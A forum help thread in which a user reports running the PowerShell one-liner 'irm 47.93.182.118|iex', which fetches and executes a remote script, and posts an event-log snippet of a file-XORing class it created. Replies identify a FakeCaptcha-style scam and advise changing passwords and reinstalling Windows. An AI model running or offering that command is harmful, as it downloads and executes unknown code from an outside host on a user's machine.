Hey everyone, I need some advice about a PowerShell command I ran without realizing it could be dangerous. The command was "irm 47.93.182.118|iex," and after looking into it, I found out it likely took something from that IP address and executed it on my system.
I've checked my Windows event viewer and noticed several suspicious entries related to a command called "Add-Type" around the time I executed it. Here's a snippet from the event log:
Details:
CommandInvocation(Add-Type): "Add-Type"
ParameterBinding(Add-Type): name="TypeDefinition"; value="using [System.IO];public class XorUtil{public static void XorFile(string p,byte key){var b=File.ReadAllBytes(p);for(int i=0;i<b.Length;i++)b[i]^=key;File.WriteAllBytes(p,b);}}"
I'm anxious because I can't find much information on what XorUtil or XorFile actually do, and I'm worried about potential malicious activity on my PC. Any help would be greatly appreciated. Thanks!
3 Answers
Yeah, you should definitely be concerned about that command. It downloads a script and executes it, which is risky! The XorUtil class you saw is a simple encryption method that uses XOR to modify files, but it looks like the script also replaces files in Steam, which isn't good news. It's wise to handle this seriously—consider doing a fresh install of Windows to be safe!
You're not alone in worrying! The Add-Type command allows you to add custom classes in PowerShell, so it's creating this XorUtil with a function to manipulate files. That IP address is no longer serving content (it returns a 403 error), which raises some red flags. Often, when an attack goes quiet like that, it might mean the perpetrator has pulled back before getting caught. Overall, unverified code run this way can lead to all kinds of malicious software getting installed, and it could be a good idea to reinstall your OS.
It looks like you may have fallen for a common scam often referred to as FakeCaptcha. These tricks usually prompt users to run suspicious commands in PowerShell, which could lead to malware being installed on your system. If you've saved any sensitive information, like passwords or payment details in your browser, make sure to update those right away. A full OS reinstall might be the best course of action here. Stay safe!
Yeah, when they say "reset," they usually mean to wipe everything and do a clean install. It’s the safest move!